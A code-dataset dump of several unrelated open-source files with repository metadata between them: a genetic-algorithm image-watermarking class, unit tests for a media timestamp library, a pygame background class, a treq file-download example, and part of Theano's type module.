[
"MIT"
] | null | null | null |
#!/usr/bin/env python3.7
'''
@author: Chang Min Park (cpark22@buffalo.edu)
- Based on open source Genetic Algorithm written in Java:
(https://github.com/memento/GeneticAlgorithm)
- Improved by refering to a paper, "Enhancement of image watermark retrieval
based on genetic algorithms", for image watermarking.
'''
import numpy as np
from ga_utils import Utils
# Whether to enable advanced strategy for initializing the first population.
ADV_1ST_POP = True
EMB_SHIFT = 2
class Individual:
    """One candidate solution in the GA-based image watermarking.

    Wraps an 8x8 image block plus the binary message to embed, and carries
    a 64-bit chromosome whose set bits are +1 pixel corrections applied
    after embedding. Fitness counts how many message bits survive an
    embed -> IDCT -> DCT -> extract round trip.
    """
    def __init__(self, img_blk: np.array, msg: np.array):
        # 8x8 spatial image block and its DCT coefficients.
        self._img_blk = img_blk
        self._dct_coef = Utils.dct2(img_blk)
        # Binary message to hide inside the block.
        self._msg = msg
        # One chromosome bit per pixel of the 8x8 block.
        self._chromosome_len = 8 * 8
        self._fitness = 0
        # Zig-zag coefficient order and per-coefficient bit capacity.
        self._zigzag = self._get_zigzag()
        self._e_cap = self._get_embedding_capacity()
        if ADV_1ST_POP:
            # Seed the chromosome from the actual embed/IDCT rounding error
            # rather than uniformly random bits.
            self._chromosomes = self._generate_initial_chromosome()
        else:
            self._chromosomes = \
                np.random.choice(a=[0, 1], size=self._chromosome_len)
    def calculate_fitness(self) -> None:
        # Calculate the similarity between the original message and the
        # extracted message from watermarked DCT after rounds of IDCT and DCT
        dct_emb = self._embed_msg()
        idct_emb = Utils.idct2(dct_emb)
        # Apply the chromosome's +1 pixel corrections before re-extracting.
        idct_emb += self._chromosomes.reshape(8,8)
        ext_msg = self._extract_msg(Utils.dct2(idct_emb.astype(int)))
        # Fitness = number of message bits recovered intact.
        self._fitness = 0
        for idx in range(len(self._msg)):
            if self._msg[idx] == ext_msg[idx]:
                self._fitness += 1
    def tostring(self) -> str:
        """Return a short debug representation of the chromosome bits."""
        return '[chromosome=%s]' % (str(self._chromosomes * 1))
    def clone(self):
        """Return a copy: chromosome/fitness copied, block and msg shared."""
        new_indiv = Individual(self._img_blk, self._msg)
        new_indiv._chromosomes = np.copy(self._chromosomes)
        new_indiv._fitness = self._fitness
        return new_indiv
    def get_fitness(self) -> int:
        return self._fitness
    def get_chromosomes(self) -> np.array:
        return self._chromosomes
    def get_w_img_blk(self) -> np.array:
        """Return the watermarked 8x8 block (embed + IDCT + corrections)."""
        dct_emb = self._embed_msg()
        idct_emb = Utils.idct2(dct_emb)
        idct_emb += self._chromosomes.reshape(8,8)
        return idct_emb.astype(np.uint8)
    # --------------------- #
    #   Private functions   #
    # --------------------- #
    def _generate_initial_chromosome(self) -> np.array:
        """Chromosome seeded with 1s where embed+IDCT changed the pixel."""
        dct_emb = self._embed_msg()
        idct_emb = Utils.idct2(dct_emb).astype(int).reshape(8,8)
        img_blk = self._img_blk.flatten()
        idct_blk = idct_emb.flatten()
        return np.array( \
            [img_blk[idx] != idct_blk[idx] for idx in range(len(idct_blk))]) * 1
    def _get_embedding_capacity(self):
        """Distribute the message bits over the usable DCT positions.

        Returns a flat 64-entry array: entry i is the number of message
        bits embedded at DCT coefficient i (0 for unused positions).
        """
        # Positions in DCT coefficient where to embed message (1 = usable
        # low-frequency band near the DC coefficient).
        positions = np.array([
            [0, 0, 1, 1, 1, 0, 0, 0],
            [0, 1, 1, 1, 0, 0, 0, 0],
            [1, 1, 1, 0, 0, 0, 0, 0],
            [1, 1, 0, 0, 0, 0, 0, 0],
            [1, 0, 0, 0, 0, 0, 0, 0],
            [0, 0, 0, 0, 0, 0, 0, 0],
            [0, 0, 0, 0, 0, 0, 0, 0],
            [0, 0, 0, 0, 0, 0, 0, 0],
        ]).flatten()
        # Indices of a list in zigzag order
        zigzag = self._zigzag
        # Bit capacity for each position: split the message as evenly as
        # possible; the first `r` slots carry one extra bit.
        cap = [0] * sum(positions)
        n = len(self._msg) // sum(positions)
        r = len(self._msg) % sum(positions)
        for idx in range(len(cap)):
            cap[idx] = n
            cap[idx] += 1 if idx < r else 0
        # Apply capacity to the positions, walking them in zig-zag order.
        for idx in range(len(positions)):
            pos = zigzag[idx]
            if positions[pos] == 1:
                positions[pos] = cap.pop(0)
        return positions
    def _get_zigzag(self):
        '''
        Returns indices of AC coefficients for watermark storage in a zig-zag
        manner. In case of block operation mode, the indices are selected in a
        per one per block manner. Eg. for block = 8
        1 3 6 . . . . .
        2 5 9 . . . . .
        4 8 . . . . . .
        7 . . . . . . .
        . . . . . . . .
        . . . . . . . .
        . . . . . . . .
        . . . . . . . .
        '''
        idx = np.zeros(8 * 8).astype(np.uint8)
        i = 0
        # Walk anti-diagonals; (cc, cr) are 1-based (column, row) counters.
        for sc in range(8 * 2):
            cc, cr = sc, 1
            while cc > 0:
                if cc <= 8 and cr <= 8:
                    idx[i] = (cc - 1) * 8 + cr
                    i += 1
                cc -= 1
                cr += 1
        return idx - 1  # Subtract 1 to all items because index starts from 0
    def _embed_msg(self) -> np.array:
        '''
        Embed the given message to a DCT of a block and construct a
        watermarked block
        :param dct: DCT of a micro block
        :param msg: binary message to embed
        :return: watermarked block
        '''
        dct_arr, msg_arr = self._dct_coef.flatten(), self._msg
        w_blk = np.zeros(len(dct_arr), dtype=np.float32)
        msg_idx = 0
        for i in range(len(dct_arr)):
            idx = self._zigzag[i]
            e_cap = self._e_cap[idx]
            dct = dct_arr[idx]
            if not e_cap == 0:
                # Take the next e_cap message bits for this coefficient.
                msg_part = msg_arr[msg_idx:msg_idx + e_cap]
                msg_idx += e_cap
                # If chromosome is True, add 1 to integer part
                int_part = int(dct)
                float_part = dct - int_part
                dec = Utils.dec_to_binarr(abs(int_part), 8)
                # Add msg_part in xxx000xx in the middle of the DCT
                dec[EMB_SHIFT:e_cap + EMB_SHIFT] = msg_part
                # Reattach the fractional part, preserving the sign.
                if dct < 0:
                    dct = float_part - Utils.binarr_to_dec(dec)
                else:
                    dct = float_part + Utils.binarr_to_dec(dec)
            w_blk[idx] = dct
        return w_blk.reshape(8,8)
    def _extract_msg(self, dct: np.array) -> np.array:
        '''
        Extract a message embedded in the given DCT array of a block
        :param dct: DCT of a block
        :return: extracted message in binary form
        '''
        # NOTE(review): despite the np.array annotation this returns a
        # plain Python list of bits — confirm callers are fine with that.
        msg_arr = []
        dct_arr = dct.flatten()
        for i in range(len(dct_arr)):
            idx = self._zigzag[i]
            e_cap = self._e_cap[idx]
            dct = dct_arr[idx]
            if not e_cap == 0:
                # Read back the e_cap bits stored at this coefficient.
                dec = Utils.dec_to_binarr(abs(int(dct)), 8)
                msg_part = dec[EMB_SHIFT:e_cap + EMB_SHIFT]
                msg_arr.extend(msg_part)
        return msg_arr
| 34.052632
| 80
| 0.531685
|
4a11056ea3e00b662c62e76a13a616565de24458
| 11,805
|
py
|
Python
|
tests/test_time_value.py
|
bbc/rd-apmm-python-lib-mediatimestamp
|
fbf44b11984fa6d45ff29f97093a7e907b140e13
|
[
"Apache-2.0"
] | 3
|
2018-09-07T01:26:08.000Z
|
2019-09-13T12:37:50.000Z
|
tests/test_time_value.py
|
bbc/rd-apmm-python-lib-mediatimestamp
|
fbf44b11984fa6d45ff29f97093a7e907b140e13
|
[
"Apache-2.0"
] | 16
|
2018-08-17T09:27:43.000Z
|
2022-02-04T17:26:21.000Z
|
tests/test_time_value.py
|
bbc/rd-apmm-python-lib-mediatimestamp
|
fbf44b11984fa6d45ff29f97093a7e907b140e13
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2019 British Broadcasting Corporation
#
# This is an internal BBC tool and is not licensed externally
# If you have received a copy of this erroneously then you do
# not have permission to reproduce it.
import unittest
from fractions import Fraction
from mediatimestamp import (
TimeOffset,
Timestamp,
SupportsMediaTimeOffset,
mediatimeoffset,
SupportsMediaTimestamp,
mediatimestamp,
TimeValue)
class TestTimeValue(unittest.TestCase):
def test_from_int(self):
tv = TimeValue(100, rate=Fraction(25))
self.assertEqual(tv.value, 100)
self.assertEqual(tv.rate, Fraction(25))
def test_from_timeoffset(self):
tv = TimeValue(TimeOffset(4), rate=None)
self.assertEqual(tv.value, TimeOffset(4))
self.assertIsNone(tv.rate)
def test_from_timestamp(self):
tv = TimeValue(Timestamp(4), rate=None)
self.assertEqual(tv.value, Timestamp(4))
self.assertIsNone(tv.rate)
def test_from_timevalue(self):
tv_in = TimeValue(100, rate=Fraction(25))
tv = TimeValue(tv_in)
self.assertEqual(tv.value, 100)
self.assertEqual(tv.rate, Fraction(25))
def test_from_timeoffset_to_count(self):
tv = TimeValue(TimeOffset(4), rate=Fraction(25))
self.assertIsInstance(tv.value, int)
self.assertEqual(tv.value, 100)
self.assertEqual(tv.rate, Fraction(25))
def test_from_timevalue_rate_change(self):
tv_in = TimeValue(100, rate=Fraction(25))
tv = TimeValue(tv_in, rate=Fraction(100))
self.assertEqual(tv.value, 400)
self.assertEqual(tv.rate, Fraction(100))
def test_unsupported_type(self):
with self.assertRaises(TypeError):
TimeValue(str(10))
def test_as_timeoffset(self):
tv = TimeValue(TimeOffset(4), rate=Fraction(25))
to = tv.as_timeoffset()
self.assertIsInstance(to, TimeOffset)
self.assertEqual(to, TimeOffset(4))
tv = TimeValue(Timestamp(4), rate=Fraction(25))
to = tv.as_timeoffset()
self.assertIsInstance(to, TimeOffset)
self.assertEqual(to, TimeOffset(4))
tv = TimeValue(100, rate=Fraction(25))
to = tv.as_timeoffset()
self.assertIsInstance(to, TimeOffset)
self.assertEqual(to, TimeOffset(4))
def test_mediatimeoffset(self):
tv = TimeValue(TimeOffset(4), rate=Fraction(25))
self.assertIsInstance(tv, SupportsMediaTimeOffset)
to = mediatimeoffset(tv)
self.assertIsInstance(to, TimeOffset)
self.assertEqual(to, TimeOffset(4))
tv = TimeValue(Timestamp(4), rate=Fraction(25))
self.assertIsInstance(tv, SupportsMediaTimeOffset)
to = mediatimeoffset(tv)
self.assertIsInstance(to, TimeOffset)
self.assertEqual(to, TimeOffset(4))
tv = TimeValue(100, rate=Fraction(25))
self.assertIsInstance(tv, SupportsMediaTimeOffset)
to = mediatimeoffset(tv)
self.assertIsInstance(to, TimeOffset)
self.assertEqual(to, TimeOffset(4))
def test_as_timestamp(self):
tv = TimeValue(Timestamp(4), rate=Fraction(25))
ts = tv.as_timestamp()
self.assertIsInstance(ts, Timestamp)
self.assertEqual(ts, Timestamp(4))
tv = TimeValue(TimeOffset(4), rate=Fraction(25))
ts = tv.as_timestamp()
self.assertIsInstance(ts, Timestamp)
self.assertEqual(ts, Timestamp(4))
tv = TimeValue(100, rate=Fraction(25))
ts = tv.as_timestamp()
self.assertIsInstance(ts, Timestamp)
self.assertEqual(ts, Timestamp(4))
def test_mediatimestamp(self):
tv = TimeValue(Timestamp(4), rate=Fraction(25))
self.assertIsInstance(tv, SupportsMediaTimestamp)
ts = mediatimestamp(tv)
self.assertIsInstance(ts, Timestamp)
self.assertEqual(ts, Timestamp(4))
tv = TimeValue(TimeOffset(4), rate=Fraction(25))
self.assertIsInstance(tv, SupportsMediaTimestamp)
ts = mediatimestamp(tv)
self.assertIsInstance(ts, Timestamp)
self.assertEqual(ts, Timestamp(4))
tv = TimeValue(100, rate=Fraction(25))
self.assertIsInstance(tv, SupportsMediaTimestamp)
ts = mediatimestamp(tv)
self.assertIsInstance(ts, Timestamp)
self.assertEqual(ts, Timestamp(4))
def test_as_count(self):
tv = TimeValue(100)
ct = tv.as_count()
self.assertEqual(ct, 100)
tv = TimeValue(TimeOffset(4), rate=Fraction(25))
ct = tv.as_count()
self.assertEqual(ct, 100)
def test_as_but_no_rate(self):
tv = TimeValue(TimeOffset(4))
with self.assertRaises(ValueError):
tv.as_count()
tv = TimeValue(100)
with self.assertRaises(ValueError):
tv.as_timeoffset()
def test_from_str(self):
cases = [
("-100", TimeValue(-100)),
("0", TimeValue(0)),
("100", TimeValue(100)),
("100@25", TimeValue(100, rate=Fraction(25))),
("100@30000/1001", TimeValue(100, rate=Fraction(30000, 1001))),
("-4:0", TimeValue(TimeOffset(4, sign=-1))),
("0:0", TimeValue(TimeOffset(0))),
("4:0", TimeValue(TimeOffset(4))),
("4:0@25", TimeValue(100, rate=Fraction(25))),
("4:0@30000/1001", TimeValue(120, rate=Fraction(30000, 1001))),
]
for case in cases:
with self.subTest(case=case):
self.assertEqual(TimeValue.from_str(case[0]), case[1])
def test_from_str_rate(self):
tv = TimeValue.from_str("100@25", rate=Fraction(100))
self.assertEqual(tv, TimeValue(100, rate=Fraction(25)))
tv = TimeValue.from_str("100", rate=Fraction(100))
self.assertEqual(tv, TimeValue(100, rate=Fraction(100)))
def test_from_str_invalid(self):
cases = [
"100@25@",
"100/30000/1001",
"abc",
]
for case in cases:
with self.subTest(case=case):
with self.assertRaises(ValueError):
TimeValue.from_str(case)
def test_to_str(self):
cases = [
("-100", TimeValue(-100), True),
("0", TimeValue(0), True),
("100", TimeValue(100), True),
("100@25", TimeValue(100, rate=Fraction(25)), True),
("100", TimeValue(100, rate=Fraction(25)), False),
("100@30000/1001", TimeValue(100, rate=Fraction(30000, 1001)), True),
("-4:0", TimeValue(TimeOffset(4, sign=-1)), True),
("0:0", TimeValue(TimeOffset(0)), True),
("4:0", TimeValue(TimeOffset(4)), True),
]
for case in cases:
with self.subTest(case=case):
self.assertEqual(case[0], case[1].to_str(include_rate=case[2]))
self.assertEqual(case[1].to_str(), str(case[1]))
def test_compare(self):
self.assertEqual(TimeValue(1), TimeValue(1))
self.assertNotEqual(TimeValue(1), TimeValue(2))
self.assertLess(TimeValue(1), TimeValue(2))
self.assertLessEqual(TimeValue(1), TimeValue(1))
self.assertGreater(TimeValue(2), TimeValue(1))
self.assertGreaterEqual(TimeValue(2), TimeValue(2))
self.assertNotEqual(TimeValue(2), TimeValue(3))
self.assertEqual(TimeValue(TimeOffset(4)), TimeValue(TimeOffset(4)))
def test_compare_with_convert(self):
self.assertEqual(TimeValue(100, rate=Fraction(25)), TimeValue(TimeOffset(4)))
self.assertEqual(TimeValue(TimeOffset(4)), TimeValue(100, rate=Fraction(25)))
def test_compare_no_rate(self):
with self.assertRaises(ValueError):
TimeValue(100) == TimeValue(TimeOffset(4))
def test_equality_none(self):
none_value = None
self.assertFalse(TimeValue(1) == none_value)
self.assertTrue(TimeValue(1) != none_value)
def test_addsub(self):
cases = [
(TimeValue(50), '+', TimeValue(50),
TimeValue(100)),
(TimeValue(50, rate=Fraction(25)), '+', TimeValue(TimeOffset(2)),
TimeValue(100, rate=Fraction(25))),
(TimeValue(TimeOffset(2)), '+', TimeValue(TimeOffset(2)),
TimeValue(TimeOffset(4))),
(TimeValue(50), '-', TimeValue(50),
TimeValue(0)),
(TimeValue(50, rate=Fraction(25)), '-', TimeValue(TimeOffset(2)),
TimeValue(0, rate=Fraction(25))),
(TimeValue(TimeOffset(2)), '-', TimeValue(TimeOffset(2)),
TimeValue(TimeOffset(0))),
]
for case in cases:
with self.subTest(case=case):
if case[1] == '+':
result = case[0] + case[2]
else:
result = case[0] - case[2]
self.assertEqual(result, case[3],
msg="{!r} {} {!r} = {!r}, expected {!r}".format(
case[0], case[1], case[2], result, case[3]))
def test_addsub_no_rate(self):
cases = [
(TimeValue(50), '+', TimeValue(TimeOffset(2))),
(TimeValue(TimeOffset(2)), '+', TimeValue(50)),
(TimeValue(50), '-', TimeValue(TimeOffset(2))),
(TimeValue(TimeOffset(2)), '-', TimeValue(50)),
]
for case in cases:
with self.subTest(case=case):
with self.assertRaises(ValueError):
if case[1] == '+':
case[0] + case[2]
else:
case[0] - case[2]
def test_multdiv(self):
cases = [
(TimeValue(50), '*', 2,
TimeValue(100)),
(TimeValue(TimeOffset(2)), '*', 2,
TimeValue(TimeOffset(4))),
(2, '*', TimeValue(50),
TimeValue(100)),
(2, '*', TimeValue(TimeOffset(2)),
TimeValue(TimeOffset(4))),
(TimeValue(50), '/', 2,
TimeValue(25)),
(TimeValue(TimeOffset(2)), '/', 2,
TimeValue(TimeOffset(1))),
(TimeValue(25), '/', 2,
TimeValue(12)),
(TimeValue(25), '//', 2,
TimeValue(12)),
]
for case in cases:
with self.subTest(case=case):
if case[1] == '*':
result = case[0] * case[2]
elif case[1] == '/':
result = case[0] / case[2]
else:
result = case[0] // case[2]
self.assertEqual(result, case[3],
msg="{!r} {} {!r} = {!r}, expected {!r}".format(
case[0], case[1], case[2], result, case[3]))
def test_multdiv_not_int(self):
cases = [
(TimeValue(50), '*', TimeValue(50)),
(TimeValue(50), '/', TimeValue(50)),
(TimeValue(50), '//', TimeValue(50)),
]
for case in cases:
with self.subTest(case=case):
with self.assertRaises(TypeError):
if case[1] == '*':
case[0] * case[2]
elif case[1] == '/':
case[0] / case[2]
else:
case[0] // case[2]
def test_immutable(self):
tv = TimeValue(0)
with self.assertRaises(ValueError):
tv._value = 1
with self.assertRaises(ValueError):
tv._rate = Fraction(50)
def test_hashable(self):
tv1 = TimeValue(0)
tv2 = TimeValue.from_str("0:20000000000@50")
self.assertNotEqual(hash(tv1), hash(tv2))
| 34.823009
| 85
| 0.557645
|
4a1105d1512c135df92938d058bf57907992b708
| 644
|
py
|
Python
|
data/modules/graphic/two_D/background.py
|
Sheidaas/gamee
|
434db4648e1719a648b8784f201b03b4c8e243c3
|
[
"CC-BY-3.0"
] | null | null | null |
data/modules/graphic/two_D/background.py
|
Sheidaas/gamee
|
434db4648e1719a648b8784f201b03b4c8e243c3
|
[
"CC-BY-3.0"
] | null | null | null |
data/modules/graphic/two_D/background.py
|
Sheidaas/gamee
|
434db4648e1719a648b8784f201b03b4c8e243c3
|
[
"CC-BY-3.0"
] | null | null | null |
import pygame
class Background:
    """A solid-colour rectangle drawn behind other screen elements."""

    def __init__(self, x1, y1, x2, y2, color: tuple, screen):
        # Scale the raw rectangle coordinates by the configured resolution
        # scale: index 0 for horizontal values, index 1 for vertical ones.
        scale = screen.engine.settings.graphic['screen']['resolution_scale']
        self.size = (x1 * scale[0], y1 * scale[1], x2 * scale[0], y2 * scale[1])
        self.color = color
        self.rect = None
        self.screen = screen

    def render_background(self):
        """Draw the filled rectangle onto the owning screen surface."""
        pygame.draw.rect(self.screen.screen, self.color, self.size)
| 37.882353
| 90
| 0.613354
|
4a11074c4bcf0b7bf6856fb6245dfac00a6db776
| 358
|
py
|
Python
|
docs/examples/download_file.py
|
chevah/treq
|
2d45c8227246583bc96cb4924722d9f79e95d4d7
|
[
"MIT"
] | null | null | null |
docs/examples/download_file.py
|
chevah/treq
|
2d45c8227246583bc96cb4924722d9f79e95d4d7
|
[
"MIT"
] | null | null | null |
docs/examples/download_file.py
|
chevah/treq
|
2d45c8227246583bc96cb4924722d9f79e95d4d7
|
[
"MIT"
] | null | null | null |
from twisted.internet.task import react
import treq
def download_file(reactor, url, destination_filename):
    """Stream *url* into *destination_filename* using treq.

    Returns a Deferred that fires after the response body has been
    collected and the file handle closed (on success or failure alike).
    """
    out = open(destination_filename, 'wb')
    deferred = treq.get(url)
    deferred.addCallback(treq.collect, out.write)
    # addBoth guarantees the file is closed even if the request fails.
    deferred.addBoth(lambda _: out.close())
    return deferred


react(download_file, ['http://httpbin.org/get', 'download.txt'])
| 25.571429
| 64
| 0.72905
|
4a110778dbe7cfb7b3fdad3984fe323a059fa7ec
| 21,081
|
py
|
Python
|
theano/gof/type.py
|
c0g/Theano
|
ef6f32d1b7a575b6153c0ca2e4347b39e766c412
|
[
"BSD-3-Clause"
] | null | null | null |
theano/gof/type.py
|
c0g/Theano
|
ef6f32d1b7a575b6153c0ca2e4347b39e766c412
|
[
"BSD-3-Clause"
] | null | null | null |
theano/gof/type.py
|
c0g/Theano
|
ef6f32d1b7a575b6153c0ca2e4347b39e766c412
|
[
"BSD-3-Clause"
] | null | null | null |
"""WRITEME Defines the `Type` class."""
__docformat__ = "restructuredtext en"
from theano.compat import PY3
from theano.gof import utils
from theano.gof.utils import MethodNotDefined, object2
from theano.gof import graph
########
# Type #
########
from theano.gof.op import CLinkerObject
class CLinkerType(CLinkerObject):
"""Interface specification for Types that can be arguments to a `CLinkerOp`.
A CLinkerType instance is mainly reponsible for providing the C code that
interfaces python objects with a C `CLinkerOp` implementation.
See WRITEME for a general overview of code generation by `CLinker`.
"""
def c_is_simple(self):
"""Optional: Return True for small or builtin C types.
A hint to tell the compiler that this type is a builtin C type or a
small struct and that its memory footprint is negligible. Simple
objects may be passed on the stack.
"""
return False
def c_literal(self, data):
"""Optional: WRITEME
:Parameters:
- `data`: WRITEME
WRITEME
:Exceptions:
- `MethodNotDefined`: Subclass does not implement this method
"""
raise MethodNotDefined("c_literal", type(self), self.__class__.__name__)
def c_declare(self, name, sub, check_input=True):
"""Required: Return c code to declare variables that will be
instantiated by `c_extract`.
Example:
.. code-block: python
return "PyObject ** addr_of_%(name)s;"
:param name: the name of the ``PyObject *`` pointer that will the value for this Type
:type name: string
:param sub: a dictionary of special codes. Most importantly
sub['fail']. See CLinker for more info on `sub` and ``fail``.
:type sub: dict string -> string
:note: It is important to include the `name` inside of variables which
are declared here, so that name collisions do not occur in the
source file that is generated.
:note: The variable called ``name`` is not necessarily defined yet
where this code is inserted. This code might be inserted to
create class variables for example, whereas the variable ``name``
might only exist inside certain functions in that class.
:todo: Why should variable declaration fail? Is it even allowed to?
:Exceptions:
- `MethodNotDefined`: Subclass does not implement this method
"""
raise MethodNotDefined()
def c_init(self, name, sub):
"""Required: Return c code to initialize the variables that were declared by
self.c_declare()
Example:
.. code-block: python
return "addr_of_%(name)s = NULL;"
:note: The variable called ``name`` is not necessarily defined yet
where this code is inserted. This code might be inserted in a
class constructor for example, whereas the variable ``name``
might only exist inside certain functions in that class.
:todo: Why should variable initialization fail? Is it even allowed to?
"""
raise MethodNotDefined("c_init", type(self), self.__class__.__name__)
def c_extract(self, name, sub, check_input=True):
"""Required: Return c code to extract a PyObject * instance.
The code returned from this function must be templated using
``%(name)s``, representing the name that the caller wants to
call this `Variable`. The Python object self.data is in a
variable called "py_%(name)s" and this code must set the
variables declared by c_declare to something representative
of py_%(name)s. If the data is improper, set an appropriate
exception and insert "%(fail)s".
:todo: Point out that template filling (via sub) is now performed
by this function. --jpt
Example:
.. code-block: python
return "if (py_%(name)s == Py_None)" + \\\
addr_of_%(name)s = &py_%(name)s;" + \\\
"else" + \\\
{ PyErr_SetString(PyExc_ValueError, \\\
'was expecting None'); %(fail)s;}"
:param name: the name of the ``PyObject *`` pointer that will
store the value for this Type
:type name: string
:param sub: a dictionary of special codes. Most importantly
sub['fail']. See CLinker for more info on `sub` and ``fail``.
:type sub: dict string -> string
:Exceptions:
- `MethodNotDefined`: Subclass does not implement this method
"""
raise MethodNotDefined("c_extract", type(self), self.__class__.__name__)
def c_extract_out(self, name, sub, check_input=True):
"""Optional: C code to extract a PyObject * instance.
Unlike c_extract, c_extract_out has to accept Py_None,
meaning that the variable should be left uninitialized.
"""
return """
if (py_%(name)s == Py_None)
{
%(c_init_code)s
}
else
{
%(c_extract_code)s
}
""" % dict(
name=name,
c_init_code=self.c_init(name, sub),
c_extract_code=self.c_extract(name, sub, check_input))
def c_cleanup(self, name, sub):
"""Return c code to clean up after `c_extract`.
This returns C code that should deallocate whatever `c_extract`
allocated or decrease the reference counts. Do not decrease
py_%(name)s's reference count.
WRITEME
:Parameters:
- `name`: WRITEME
WRITEME
- `sub`: WRITEME
WRITEME
:Exceptions:
- `MethodNotDefined`: Subclass does not implement this method
"""
raise MethodNotDefined()
def c_sync(self, name, sub):
"""Required: Return c code to pack C types back into a PyObject.
The code returned from this function must be templated using "%(name)s",
representing the name that the caller wants to call this Variable. The
returned code may set "py_%(name)s" to a PyObject* and that PyObject*
will be accessible from Python via variable.data. Do not forget to adjust
reference counts if "py_%(name)s" is changed from its original value.
:Parameters:
- `name`: WRITEME
WRITEME
- `sub`: WRITEME
WRITEME
:Exceptions:
- `MethodNotDefined`: Subclass does not implement this method
"""
raise MethodNotDefined("c_sync", type(self), self.__class__.__name__)
def c_code_cache_version(self):
"""Return a tuple of integers indicating the version of this Type.
An empty tuple indicates an 'unversioned' Type that will not be cached between processes.
The cache mechanism may erase cached modules that have been superceded by newer
versions. See `ModuleCache` for details.
"""
return ()
class PureType(object):
"""Interface specification for variable type instances.
A :term:`Type` instance is mainly reponsible for two things:
- creating `Variable` instances (conventionally, `__call__` does this), and
- filtering a value assigned to a `Variable` so that the value conforms to restrictions
imposed by the type (also known as casting, this is done by `filter`),
"""
Variable = graph.Variable #the type that will be created by call to make_variable.
Constant = graph.Constant #the type that will be created by call to make_constant
def filter(self, data, strict=False, allow_downcast=None):
"""Required: Return data or an appropriately wrapped/converted data.
Subclass implementation should raise a TypeError exception if the data is not of an
acceptable type.
If strict is True, the data returned must be the same as the
data passed as an argument. If it is False, and allow_downcast
is True, filter may cast it to an appropriate type. If
allow_downcast is False, filter may only upcast it, not lose
precision. If allow_downcast is None (default), the behaviour can be
Type-dependent, but for now it means only Python floats can be
downcasted, and only to floatX scalars.
:Exceptions:
- `MethodNotDefined`: subclass doesn't implement this function.
"""
raise MethodNotDefined("filter", type(self), self.__class__.__name__)
# If filter_inplace is defined, it will be called instead of
# filter() This is to allow reusing the old allocated memory. As
# of this writing this is used only when we transfer new data to a
# shared variable on the gpu.
#def filter_inplace(value, storage, strict=False, allow_downcast=None)
def filter_variable(self, other):
"""Convert a symbolic variable into this Type, if compatible.
For the moment, the only Types compatible with one another are
TensorType and CudaNdarrayType, provided they have the same
number of dimensions, same broadcasting pattern, and same dtype.
If Types are not compatible, a TypeError should be raised.
"""
if not isinstance(other, graph.Variable):
# The value is not a Variable: we cast it into
# a Constant of the appropriate Type.
other = self.Constant(type=self, data=other)
if other.type != self:
raise TypeError(
'Cannot convert Type %(othertype)s '
'(of Variable %(other)s) into Type %(self)s. '
'You can try to manually convert %(other)s into a %(self)s.'
% dict(
othertype=other.type,
other=other,
self=self)
)
return other
def is_valid_value(self, a):
"""Required: Return True for any python object `a` that would be a legal value for a Variable of this Type"""
try:
self.filter(a, strict=True)
return True
except (TypeError, ValueError):
return False
def value_validity_msg(self, a):
"""Optional: return a message explaining the output of is_valid_value"""
return "none"
def make_variable(self, name = None):
"""Return a new `Variable` instance of Type `self`.
:Parameters:
- `name`: None or str
A pretty string for printing and debugging.
"""
return self.Variable(self, name = name)
def make_constant(self, value, name=None):
return self.Constant(type=self, data=value, name=name)
def __call__(self, name=None):
"""Return a new `Variable` instance of Type `self`.
:Parameters:
- `name`: None or str
A pretty string for printing and debugging.
"""
return utils.add_tag_trace(self.make_variable(name))
def values_eq(self, a, b):
"""
Return True if a and b can be considered exactly equal.
a and b are assumed to be valid values of this Type.
"""
return a == b
def values_eq_approx(self, a, b):
"""
Return True if a and b can be considered approximately equal.
:param a: a potential value for a Variable of this Type.
:param b: a potential value for a Variable of this Type.
:rtype: Bool
This function is used by theano debugging tools to decide
whether two values are equivalent, admitting a certain amount
of numerical instability. For example, for floating-point
numbers this function should be an approximate comparison.
By default, this does an exact comparison.
"""
return self.values_eq(a, b)
# def get_shape_info(self, obj):
"""
Optional function. See TensorType().get_shape_info for definition
"""
# def get_size(self, shape_info):
"""
Optional function. See TensorType().get_size for definition
"""
_nothing = """
"""
class Type(object2, PureType, CLinkerType):
"""Convenience wrapper combining `PureType` and `CLinkerType`.
Theano comes with several subclasses of such as:
- `Generic`: for any python type
- `TensorType`: for numpy.ndarray
- `SparseType`: for scipy.sparse
But you are encouraged to write your own, as described in WRITEME.
The following following code illustrates the use of a Type instance, here tensor.fvector:
.. code-block:: python
# Declare a symbolic floating-point vector using __call__
b = tensor.fvector()
# Create a second Variable with the same Type instance
c = tensor.fvector()
Whenever you create a symbolic variable in theano (technically, `Variable`) it will contain a
reference to a Type instance. That reference is typically constant during the lifetime of
the Variable. Many variables can refer to a single Type instance, as do b and c above. The
Type instance defines the kind of value which might end up in that variable when executing
a `Function`. In this sense, theano is like a strongly-typed language because the types
are included in the graph before the values. In our example above, b is a Variable which is
guaranteed to correspond to a numpy.ndarray of rank 1 when we try to do some computations
with it.
Many `Op` instances will raise an exception if they are applied to inputs with incorrect
types. Type references are also useful to do type-checking in pattern-based optimizations.
"""
def convert_variable(self, var):
"""Patch variable so that its type will match self, if possible.
If the variable can't be converted, this should return None.
The conversion can only happen if the following implication is
true for all possible `val`.
self.is_valid_value(val) => var.type.is_valid_value(val)
For the majority of types this means that you can only have
non-broadcastable dimensions become broadcastable and not the
inverse.
The default is to not convert anything which is always safe.
"""
return None
class SingletonType(Type):
    """Convenient base class for a Type subclass with no attributes.

    It saves having to implement __eq__ and __hash__ by making all
    instances of a given subclass interchangeable.
    """
    __instance = None
    def __new__(cls):
        # If a sub-subclass of SingletonType does not redeclare __instance,
        # a lookup would find the attribute on the parent class. We don't
        # want to share an instance across classes, so we also check that
        # the cached instance really is of class `cls`; each class then
        # caches its own instance.
        if cls.__instance is None or not isinstance(cls.__instance, cls):
            cls.__instance = Type.__new__(cls)
        return cls.__instance
    def __str__(self):
        return self.__class__.__name__
    # Even with __new__ above, singleton identity is not always guaranteed
    # (see test_type_other.test_none_Constant for an example), so equality
    # falls back to comparing the concrete type.
    def __eq__(self, other):
        if self is other:
            return True
        if type(self) is type(other):
            return True
        return False
    def __hash__(self):
        # Consistent with __eq__: all instances of one class hash alike.
        return hash(type(self))
class Generic(SingletonType):
    """
    Represents a generic Python object.
    This class implements the `PureType` and `CLinkerType` interfaces for
    generic PyObject instances: any Python value is accepted unchanged, and
    the generated C code passes the raw PyObject* around, managing only its
    reference count.
    """
    def filter(self, data, strict=False, allow_downcast=None):
        # Every Python object is a valid value; no conversion needed.
        return data
    def is_valid_value(self, a):
        return True
    def c_declare(self, name, sub, check_input=True):
        # Storage is simply a PyObject pointer.
        return """
        PyObject* %(name)s;
        """ % locals()
